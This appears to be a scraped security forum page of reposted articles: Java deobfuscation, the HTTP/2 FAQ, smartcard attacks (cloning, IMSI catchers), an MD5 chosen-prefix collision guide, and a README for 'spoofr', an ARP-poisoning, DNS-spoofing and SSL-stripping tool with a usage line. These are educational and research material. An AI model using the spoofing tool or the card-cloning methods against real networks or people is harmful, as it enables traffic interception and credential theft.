extract out the switch table – which holds the XOR key - and the strings using regexes. This would be reasonably simple but error prone and regex just does not seem like an elegant solution. An alternative approach is to write our own Java decompiler which gives us a nice abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution. To perform this task, we chose the second option. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult. Parsing the class file - overview First we parse the class file format, extracting the constants pool, fields, interfaces, classes and methods. We then disassemble the methods body (mapping instructions to a set of opcodes), the resulting disassembly looks like the below (snippet): Figure 6 - Showing the byte to opcode translation, each section is divided into a grouping (e.g. Constants,Loads,Maths,Stack) an operation (e.g. bipush) and an optional argument (instruction dependent, such as ‘77’). As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data. Extracting encryption function We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see based on the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect. Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in: As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in screenshot) is the padding which we discard. Our algorithm for extracting this table is as follows: Detect if a control section contains a tableswitch. Extract the tableswitch. Extract the jumps from the tableswitch. Build a new jump table containing the original jump table with the default jump case appended on the end. We now have all the jumps to the keys. Map over the method body and resolve the jumps to values. We now have all the key values and the XOR function name. Figure 7 – Code(F#) Showing the pattern matching function which implements the algorithm to extract switch tables. Figure 8 - Showing the resulting extracted XOR keys from the switch tableThe next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variable. Extracting the static initialization section is trivial, we map over the code body and find sections where the name is `<clinit>' [9] and the descriptor is `()V' which denotes a method with no parameters that returns void [10]. Once we have extracted this, we resolve the 'private static' values making sure to only select the values where our decryption function is being called (we know the name of the function as we saved it). It is now just a process of resolving the strings within the constants pool. At this stage we have: Extracted the decryption key; The actual decryption algorithm implemented (XOR); and Encrypted strings. We can now decrypt the strings and replace the respective constant pool entry with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting non relevant parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions. Figure 9 - Example decryption, plaintext bytes, cipher bytes, and plaintext result. The particular class file we chose to look at, turned out to not have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities, which is a story for another day. Conclusion In conclusion, we have shown that by investing time into our reversing, we are able to have higher confidence of the functionality of the target application, and by automating the recovery of obfuscated code, we have shown that obfuscation alone is not an adequate protection mechanism, but it does slow an attacker down. In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool. Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge. [0] Protect Your Java Code - Through Obfuscators and Beyond [1] Java Decompiler [2] 404 Not Found [3] Function overloading - Wikipedia, the free encyclopedia [4] https://github.com/Storyyeller/Krakatau [5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html [6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html [7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch [8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html [9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit [10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv Sursa: http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/
  19. HTTP/2 Frequently Asked Questions These are Frequently Asked Questions about HTTP/2. General Questions Why revise HTTP? Who is doing this? What’s the relationship with SPDY? Is it HTTP/2.0 or HTTP/2? What are the key differences to HTTP/1.x? Why is HTTP/2 binary? Why is HTTP/2 multiplexed? Why just one TCP connection? What’s the benefit of Server Push? Why do we need header compression? Why HPACK? Can HTTP/2 make cookies (or other headers) better? What about non-browser users of HTTP? Does HTTP/2 require encryption? What does HTTP/2 do to improve security? Can I use HTTP/2 now? Will HTTP/2 replace HTTP/1.x? Will there be a HTTP/3? [*]Implementation Questions Why the rules around Continuation on HEADERS frames? What is the minimum or maximum HPACK state size? How can I avoid keeping state? Why is there a single compression/flow-control context? Why is there an EOS symbol in HPACK? [*]Deployment Questions How do I debug HTTP/2 if it’s encrypted? General Questions Why revise HTTP? HTTP/1.1 has served the Web well for more than fifteen years, but its age is starting to show. Loading a Web page is more resource intensive than ever (see the HTTP Archive’s page size statistics), and loading all of those assets efficiently is difficult, because HTTP practically only allows one outstanding request per TCP connection. In the past, browsers have used multiple TCP connections to issue parallel requests. However, there are limits to this; if too many connections are used, it’s both counter-productive (TCP congestion control is effectively negated, leading to congestion events that hurt performance and the network), and it’s fundamentally unfair (because browsers are taking more than their share of network resources). At the same time, the large number of requests means a lot of duplicated data “on the wire”. Both of these factors means that HTTP/1.1 requests have a lot of overhead associated with them; if too many requests are made, it hurts performance. This has led the industry to a place where it’s considered Best Practice to do things like spriting, data: inlining, domain sharding and concatenation. These hacks are indications of underlying problems in the protocol itself, and cause a number of problems on their own when used. Who made HTTP/2? HTTP/2 was developed by the IETF’s HTTP Working Group, which maintains the HTTP protocol. It’s made up of a number of HTTP implementers, users, network operators and HTTP experts. Note that while our mailing list is hosted on the W3C site, this is not a W3C effort. Tim Berners-Lee and the W3C TAG are kept up-to-date with the WG’s progress, however. A large number of people have contributed to the effort, but the most active participants include engineers from “big” projects like Firefox, Chrome, Twitter, Microsoft’s HTTP stack, Curl and Akamai, as well as a number of HTTP implementers in languages like Python, Ruby and NodeJS. To learn more about participating in the IETF, see the Tao of the IETF; you can also get a sense of who’s contributing to the specification on Github’s contributor graph, and who’s implementing on our implementation list. What’s the relationship with SPDY? HTTP/2 was first discussed when it became apparent that SPDY was gaining traction with implementers (like Mozilla and nginx), and was showing significant improvements over HTTP/1.x. After a call for proposals and a selection process, SPDY/2 was chosen as the basis for HTTP/2. Since then, there have been a number of changes, based on discussion in the Working Group and feedback from implementers. Throughout the process, the core developers of SPDY have been involved in the development of HTTP/2, including both Mike Belshe and Roberto Peon. In February 2015, Google announced its plans to remove support for SPDY in favor of HTTP/2. Is it HTTP/2.0 or HTTP/2? The Working Group decided to drop the minor version (“.0”) because it has caused a lot of confusion in HTTP/1.x. In other words, the HTTP version only indicates wire compatibility, not feature sets or “marketing.” What are the key differences to HTTP/1.x? At a high level, HTTP/2: is binary, instead of textual is fully multiplexed, instead of ordered and blocking can therefore use one connection for parallelism uses header compression to reduce overhead allows servers to “push” responses proactively into client caches Why is HTTP/2 binary? Binary protocols are more efficient to parse, more compact “on the wire”, and most importantly, they are much less error-prone, compared to textual protocols like HTTP/1.x, because they often have a number of affordances to “help” with things like whitespace handling, capitalization, line endings, blank links and so on. For example, HTTP/1.1 defines four different ways to parse a message; in HTTP/2, there’s just one code path. It’s true that HTTP/2 isn’t usable through telnet, but we already have some tool support, such as a Wireshark plugin. Why is HTTP/2 multiplexed? HTTP/1.x has a problem called “head-of-line blocking,” where effectively only one request can be outstanding on a connection at a time. HTTP/1.1 tried to fix this with pipelining, but it didn’t completely address the problem (a large or slow response can still block others behind it). Additionally, pipelining has been found very difficult to deploy, because many intermediaries and servers don’t process it correctly. This forces clients to use a number of heuristics (often guessing) to determine what requests to put on which connection to the origin when; since it’s common for a page to load 10 times (or more) the number of available connections, this can severely impact performance, often resulting in a “waterfall” of blocked requests. Multiplexing addresses these problems by allowing multiple request and response messages to be in flight at the same time; it’s even possible to intermingle parts of one message with another on the wire. This, in turn, allows a client to use just one connection per origin to load a page. Why just one TCP connection? With HTTP/1, browsers open between four and eight connections per origin. Since many sites use multiple origins, this could mean that a single page load opens more than thirty connections. One application opening so many connections simultaneously breaks a lot of the assumptions that TCP was built upon; since each connection will start a flood of data in the response, there’s a real risk that buffers in the intervening network will overflow, causing a congestion event and retransmits. Additionally, using so many connections unfairly monopolizes network resources, “stealing” them from other, better-behaved applications (e.g., VoIP). What’s the benefit of Server Push? When a browser requests a page, the server sends the HTML in the response, and then needs to wait for the browser to parse the HTML and issue requests for all of the embedded assets before it can start sending the JavaScript, images and CSS. Server Push allows the server to avoid this round trip of delay by “pushing” the responses it thinks the client will need into its cache. Why do we need header compression? Patrick McManus from Mozilla showed this vividly by calculating the effect of headers for an average page load. If you assume that a page has about 80 assets (which is conservative in today’s Web), and each request has 1400 bytes of headers (again, not uncommon, thanks to Cookies, Referer, etc.), it takes at least 7-8 round trips to get the headers out “on the wire.” That’s not counting response time - that’s just to get them out of the client. This is because of TCP’s Slow Start mechanism, which paces packets out on new connections based on how many packets have been acknowledged – effectively limiting the number of packets that can be sent for the first few round trips. In comparison, even mild compression on headers allows those requests to get onto the wire within one roundtrip – perhaps even one packet. This overhead is considerable, especially when you consider the impact upon mobile clients, which typically see round-trip latency of several hundred milliseconds, even under good conditions. Why HPACK? SPDY/2 proposed using a single GZIP context in each direction for header compression, which was simple to implement as well as efficient. Since then, a major attack has been documented against the use of stream compression (like GZIP) inside of encryption; CRIME. With CRIME, it’s possible for an attacker who has the ability to inject data into the encrypted stream to “probe” the plaintext and recover it. Since this is the Web, JavaScript makes this possible, and there were demonstrations of recovery of cookies and authentication tokens using CRIME for TLS-protected HTTP resources. As a result, we could not use GZIP compression. Finding no other algorithms that were suitable for this use case as well as safe to use, we created a new, header-specific compression scheme that operates at a coarse granularity; since HTTP headers often don’t change between messages, this still gives reasonable compression efficiency, and is much safer. Can HTTP/2 make cookies (or other headers) better? This effort was chartered to work on a revision of the wire protocol – i.e., how HTTP headers, methods, etc. are put “onto the wire”, not change HTTP’s semantics. That’s because HTTP is so widely used. If we used this version of HTTP to introduce a new state mechanism (one example that’s been discussed) or change the core methods (thankfully, this hasn’t yet been proposed), it would mean that the new protocol was incompatible with the existing Web. In particular, we want to be able to translate from HTTP/1 to HTTP/2 and back with no loss of information. If we started “cleaning up” the headers (and most will agree that HTTP headers are pretty messy), we’d have interoperability problems with much of the existing Web. Doing that would just create friction against the adoption of the new protocol. All of that said, the HTTP Working Group is responsible for all of HTTP, not just HTTP/2. As such, we can work on new mechanisms that are version-independent, as long as they’re backwards-compatible with the existing Web. What about non-browser users of HTTP? Non-browser applications should be able to use HTTP/2 as well, if they’re already using HTTP. Early feedback has been that HTTP/2 has good performance characteristics for HTTP “APIs”, because the APIs don’t need to consider things like request overhead in their design. Having said that, the main focus of the improvements we’re considering is the typical browsing use cases, since this is the core use case for the protocol. Our charter says this about it: The resulting specification(s) are expected to meet these goals for common existing deployments of HTTP; in particular, Web browsing (desktop and mobile), non-browsers ("HTTP APIs"), Web serving (at a variety of scales), and intermediation (by proxies, corporate firewalls, "reverse" proxies and Content Delivery Networks). Likewise, current and future semantic extensions to HTTP/1.x (e.g., headers, methods, status codes, cache directives) should be supported in the new protocol. Note that this does not include uses of HTTP where non-specified behaviours are relied upon (e.g., connection state such as timeouts or client affinity, and "interception" proxies); these uses may or may not be enabled by the final product. Does HTTP/2 require encryption? No. After extensive discussion, the Working Group did not have consensus to require the use of encryption (e.g., TLS) for the new protocol. However, some implementations have stated that they will only support HTTP/2 when it is used over an encrypted connection. What does HTTP/2 do to improve security? HTTP/2 defines a profile of TLS that is required; this includes the version, a ciphersuite blacklist, and extensions used. See the spec for details. There is also discussion of additional mechanisms, such as using TLS for HTTP:// URLs (so-called “opportunistic encryption”); see the relevant draft. Can I use HTTP/2 now? HTTP/2 is currently available in Firefox and Chrome for testing, using the “h2-14” protocol identifier. There are also several servers available (including a test server from Akamai, Google and Twitter’s main sites), and a number of Open Source implementations that you can deploy and test. See the implementations list for more details. Will HTTP/2 replace HTTP/1.x? The goal of the Working Group is that typical uses of HTTP/1.x can use HTTP/2 and see some benefit. Having said that, we can’t force the world to migrate, and because of the way that people deploy proxies and servers, HTTP/1.x is likely to still be in use for quite some time. Will there be a HTTP/3? If the negotiation mechanism introduced by HTTP/2 works well, it should be possible to support new versions of HTTP much more easily than in the past. Implementation Questions Why the rules around Continuation on HEADERS frames? Continuation exists since a single value (e.g. Set-Cookie) could exceed 16KiB - 1, which means it couldn’t fit into a single frame. It was decided that the least error-prone way to deal with this was to require that all of the headers data come in back-to-back frames, which made decoding and buffer management easier. What is the minimum or maximum HPACK state size? The receiver always controls the amount of memory used in HPACK, and can set it to zero at a minimum, with a maximum related to the maximum representable integer in a SETTINGS frame, currently 2^32 - 1. How can I avoid keeping HPACK state? Send a SETTINGS frame setting state size (SETTINGS_HEADER_TABLE_SIZE) to zero, then RST all streams until a SETTINGS frame with the ACK bit set has been received. Why is there a single compression/flow-control context? Simplicity. The original proposals had stream groups, which would share context, flow control, etc. While that would benefit proxies (and the experience of users going through them), doing so added a fair bit of complexity. It was decided that we’d go with the simple thing to begin with, see how painful it was, and address the pain (if any) in a future protocol revision. Why is there an EOS symbol in HPACK? HPACK’s huffman encoding, for reasons of CPU efficiency and security, pads out huffman-encoded strings to the next byte boundary; there may be between 0-7 bits of padding needed for any particular string. If one considers huffman decoding in isolation, any symbol that is longer than the required padding would work; however, HPACK’s design allows for bytewise comparison of huffman-encoded strings. By requiring that the bits of the EOS symbol are used for padding, we ensure that users can do bytewise comparison of huffman-encoded strings to determine equality. This in turn means that many headers can be interpreted without being huffman decoded. Can I implement HTTP/2 without implementing HTTP/1.1? Yes, mostly. For HTTP/2 over TLS (h2), if you do not implement the http1.1 ALPN identifier, then you will not need to support any HTTP/1.1 features. For HTTP/2 over TCP (h2c), you need to implement the initial upgrade request. h2c-only clients will need to generate a request an OPTIONS request for “*” or a HEAD request for “/” are fairly safe and easy to construct. Clients looking to implement HTTP/2 only will need to treat HTTP/1.1 responses without a 101 status code as errors. h2c-only servers can accept a request containing the Upgrade header field with a fixed 101 response. Requests without the h2c upgrade token can be rejected with a 505 (HTTP Version Not Supported) status code that contains the Upgrade header field. Servers that don’t wish to process the HTTP/1.1 response should reject stream 1 with a REFUSED_STREAM error code immediately after sending the connection preface to encourage the client to retry the request over the upgraded HTTP/2 connection. Deployment Questions How do I debug HTTP/2 if it’s encrypted? There are many ways to get access to the application data, but the easiest is to use NSS keylogging in combination with the Wireshark plugin (included in recent development releases). This works with both Firefox and Chrome. Sursa: https://http2.github.io/faq/
  20. Introduction to Smartcard Security Introduction In 1968 and 1969, the smartcard was patented in German by Helmut Gröttrup and Jürgen Dethloff. The smartcard is simply a card with an Integrated Circuit that could be programmed. This technology has been used widely in our daily lives and will become one of the important keys in Internet of Things (IoT) and Machine to Machine (M2M) technology. Smartcard applications could be programmed using Java Card, an open platform from Sun Microsystems. Today, we find smartcard technology mostly used in communications (GSM/CDMA Sim Card) and payments (credit/debit card). This is an example of smartcard technology that has been used in Indonesia: Picture 1. EMVd ebit card. Picture 2. Bolt 4G card. Smartcard Architecture Picture 3. Smartcard architecture (image courtesy of THC) How Does the Smartcard Work? 1. Smartcard Activation In order to interact with the smartcard that has been connected to a smartcard terminal, it should be activated using electrical signals according to smartcard specification class A, B, or C (ISO/IEC 7816-3). The activation sequence goes like this: RST pin should be put to LOW state. Vcc pin should be powered. I/O pin on the smartcard terminal should be put to receive mode, even though it could ignore the I/O logic while smartcard activation takes place. CLK pin should provide clock signal to the smartcard. More detailed information about this smartcard activation (before timing Ta) can be seen in this picture: Picture 4. Smartcard activation and cold reset. 2. Cold Reset At the end of activation (RST pin pulled to LOW, Vcc pin has been powered, I/O on smartcard terminal has been put to receive mode and CLK pin supplied a stable clock signal), then the smartcard is ready to enter Cold Reset. As you can see from the above picture, the clock signal at the CLK pin starts at Ta and the smartcard will set the I/O signal to HIGH in 200 clock cycle (ta delay) after the clock signal is applied to CLK pin (Ta + ta). The RST pin should be kept in LOW state for at least 400 clock cycles (tb delay) after clock signal has been given to CLK pin (Ta + tb). The smartcard terminal could ignore the logic in I/O pin when RST pin is on LOW state. RST pin then change to HIGH state after reaching Tb. I/O pin will begin the Answer-to-Reset from 400 to 40000 clock cycle (tc delay) after rising edge signal in RST pin (Tb + tc). If there is no answer after the 40000 clock cycle when the RST pin is in HIGH state, then the smartcard terminal could deactivate the smartcard. 3. Smartcard ATR (Answer-to-Reset) After the smartcard performs a cold reset, then it will continue with Answer-to-Reset (ATR). The complete ATR structure is covered in ISO/IEC 7816-3, and it looks like this: TS T0 TA1 TB1 TC1 TD1 TA2 … … TDn T1 … TK TCK For example, this is the Answer-to-Reset that we receive after performing a cold reset on a smartcard: 3B BE 94 00 40 14 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 After receiving the ATR above, we then continue with interpreting the data as follows: TS = 3B It means that the smartcard operates using direct convention that works almost like UART protocol. The direct convention operation was covered in ISO/IEC 7816-3. T0 = BE (1011 11102) – High nibble (B16 = 10112) means that there is a data on TA1, TB1, dan TD1. – Low nibble (E16 = 1410) means that there is 14 bytes of history data (TK). TA1 = 94 (1001 01002) – High nibble (916 = 10012) means that the clock rate is Fi = 512 with fmax = 5 MHz. – Low nibble (416 = 01002) means that bit rate Di = 8. TB1 = 00 According to ISO/IEC 7816-3, the TB1 and TB2 has been deprecated and not used anymore so the smartcard doesn’t have to transmit it and the smartcard terminal could just ignore it. TD1 = 40 (0100 00002) – High nibble (416 = 01002) means that TC2 contains data. – Low nibble (016 = 00002) means that the smartcard is using T = 0 protocol. TC2 = 14 (2010) This is the Waiting Time Integer (WI) with a value of 20. From the ISO/IEC 7816-3, the value could be used to calculate Waiting Time (WT) with this formula: History bytes = 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 This could be converted to ASCII : G G 3 S 3 D H A T L 9 1 0 0 4. Protocol and Parameter Selection Interface (PPS) After getting Answer-to-Reset (ATR), the smartcard interface then could send PPS instruction to choose which protocol and parameter it would use to make data transfer between the smartcard and the terminal easier. 5. Data Transfer Between Smartcard and Terminal After the Protocol and Parameter Selection (PPS) has been setup, the smartcard and the terminal interface could begin transferring data using Application Protocol Data Unit (APDU). The complete structure for APDU is covered in ISO 7816-4. Vulnerabilities There are quite a lot of vulnerabilities related to the java card, and most of them have been documented across the Internet. This is some of the smartcard’s attack vector: 1. Physical attack: Reverse engineering. Smartcard cloning. 2. Remote attack: IMSI catcher. Attacking a Smartcard 1. Physical Attack Physical attack could be carried out if the attacker has physical contact with victim’s smartcard and gets access to important data on the smartcard. Once the attacker has access to that important data, he/she could perform a smartcard cloning or reprogramming of the smartcard. 1.1. Reverse Engineering Picture 5. Typical smartcard front side. Picture 6. Typical smartcard back side. Picture 7. Smartcard IC “die” Reverse engineering smartcard at silicon level is not an easy task and requires some special tools such as Scanning Electron Microscope (SEM) and/or Focused Ion Beam (FIB). 1.2. Smartcard Cloning For this purpose, an attacker could use a couple of devices like an oscilloscope and smartcard reader. This is an example of DIY smartcard reader (phoenix reader): Picture 8. DIY smartcard reader (phoenix reader). However, there’s a catch for the phoenix reader like the one in the above picture – its lack of application for interfacing with smartcard. The reference schematic for phoenix reader used in the above picture was developed by Dejan Kaljevic and is freely available. Picture 9. Phoenix reader schematic. Smartcard cloning is not just about programming the smartcard, but also retrieving important information about the victim’s smartcard such as which vendor issued the card. The more convenient way to interact with the smartcard is by using PCSC reader with an opensource application called pcsc_scan. This is an example of pcsc_scan usage: Picture 10. Information retrieved from smartcard payment. Picture 11. Information from 3G/4G smartcard. As you may see in the picture above, we could get some information from the smartcard attached to the terminal. Picture 10 shows a smartcard that’s commonly used in a financial institution which complies with the EMV standard, and picture 11 shows a smartcard (USIM) that’s commonly used for communication (3G/4G). That information could be used to determine what kind of encryption the smartcard uses, since vendors tends to follow standard specs and not use custom encryption. Attackers could then use the information to perform a remote attack. 2. Remote Attack Remote attacking smartcard could be achieved by exploiting vulnerabilities in the smartcard. For example; by injecting malicious “binary sms”. 2.1. IMSI Catcher The cost for this kind of attack is quite high, since the attacker must have some kind of hardware that could run OpenBTS and work as a fake BTS. In order to become a fake BTS, that hardware should generate a stronger signals than the real BTS to force the victim’s terminal (i.e mobile phone) to connect to the fake BTS. Picture 12. Fake BTS (IMSI catcher) illustration. After the victim’s mobile phone is connected to the fake BTS, the attacker then could send a payload using the Over-the-Air (OTA) method that is common for GSM networks and direct the payload to the smartcard inside the mobile phone. Conclusion From the explanation above, we can conclude that an attacker who could exploit a vulnerability on smartcard would result in a catastrophic event, especially if it’s related to a critical infrastructure, such as a SCADA installation that utilizes GSM networks or financial institution that utilize GSM networks for their mobile banking. In order to prevent such an attack on a smartcard, vendors could implement some protection, such as developing custom EEPROM for java card. References ISO/IEC 7816. (ISO/IEC 7816 - Wikipedia, the free encyclopedia) Java Card. (Java Card - Wikipedia, the free encyclopedia) Java Card Technology from Oracle. (http://www.oracle.com/technetwork/java/embedded/javacard/overview/index-jsp-140503.html) ETSI TS 100 977, TS 101 267, TS 102 221, TS 102 223, EN 302 409. Author Tri Sumarno Sursa: Introduction to Smartcard Security - InfoSec Institute
  21. Nytro

    Cmd.fm

    Command line https://cmd.fm/
  22. Nytro

    spoofr

    spoofr spoofr - ARP poison and sniff with DNS spoofing, urlsnarf, driftnet, ferret, dsniff, sslstrip and tcpdump. Usage: spoofr -t <target> -s (break SSL) [in any order] -t - Target IP address extension -s - Break ssl -h - This help Example: spoofr -t 100 -s -Attack $ENET"100" and break SSL Sursa: https://github.com/d4rkcat/Spoofr
  23. Create your own MD5 collisions A while ago a lot of people visited my site (~ 90,000 ) with a post about how easy it is to make two images with same MD5 by using a chosen prefix collision. I used Marc Steven'sHashClash on AWS and estimated the the cost of around $0.65 per collision. Given the level of interest I expected to see cool MD5 collisions popping up all over the place. Possibly it was enough for most people to know it can be done quite easily and cheaply but also I may have missed out enough details in my original post. In this further post I’ve made an AWS image available and created a step-by-step guide so that you too can create MD5 chosen prefix collisions and amuse your friends (disclaimer: they not be that amused). All you need to do is create an AWS instance and run a few commands from the command line. There is a explanation of how the chosen prefix collision works in Marc Steven's Masters thesis. Here are the steps to create a collision. 1) Log on to AWS console and create a spot request for an instance based on my public Amazon Machine Image (AMI). Spot requests are much cheaper than creating instances directly, typically $0.065 an hour. They can be destroyed, losing your data, if the price spikes but for fun projects they are the way to go. I have created a public AMI called hash-clash-demo. It has the id ami-dc93d3b4 and is in the US East (North Virginia) region. It has all the software necessary to create a collision pre-built. Search for it with ami-dc93d3b4 in community AMIs and then choose a GPU2 instance. I promise it does not mine bitcoins in the background although thinking about it this would be a good scam and I may introduce this functionality. 2) Once your request has been created and evaluated hopefully you will have a running instance to connect to via SSH. You may need to create a new key pair, follow the instructions on AWS to do this and install on your local machine. Once you have your key installed log onto instance via ssh as ec2-user. 3) The shell script for running hash clash is located at /home/ec2-user/hashclash/src/scripts . Change into that directory and download some data to create a collision. Here I download a couple of jpeg images from tumblr. 4) It is best to run the shell script in a screen session so you can detach from it and do other stuff. Start a screen session by typing screen Once you are in the screen session kick off the cpc.sh shell script with your two files. Send the outputs to a log file in this case I called it demo.output. Detach from the screen session with Ctrl A + D 5) Tailing the log file you should be ale to see the birthday attack to get the hash differences into the correct locations starting. tail -f demo.output 6) Leave the birthday search to do it's thing for an hour or so. Hopefully when you come back the attack should have moved on to the next stage, creating the near collision blocks to gradually reduce the hash differences. The best way to check this is to look at files created. The workdir0 contains all the data for the current collision search for the first near collision block. More of these will be created as more near collision blocks are created. 7) Go away again, a watched collision pretty much never happens. Check back in ~5 hours that it is still going on. Tailing demo.output and listing the directory should let you know roughly what stage the attack is at. Here we are only at block number 2 of probably 9. 8) Come back again about 10-12 hours from start and with any luck we have a collision. This one finished at 02:45 in the morning having been started at 10:30 the previous morning. You can tell when it finished as that was the last point the log was written to. If the log log file is still being updated the collision search is still going on. It took 9 near collision blocks to finally eliminate all the differences which is normal. 16 hours is a bit longer than average. The collisions have been created in files named plane.jpg.coll and ship.jpg.coll. You can verify they do indeed have the same md5 hash with md5sum. Here are the images with collision blocks added. I downloaded them to my local machine with scp Posted by Nathaniel McHugh at 2:01 PM Sursa: http://natmchugh.blogspot.co.uk/2015/02/create-your-own-md5-collisions.html
  24. NSA: https://twitter.com/NSA_PR/status/567554102284935169
×
×
  • Create New...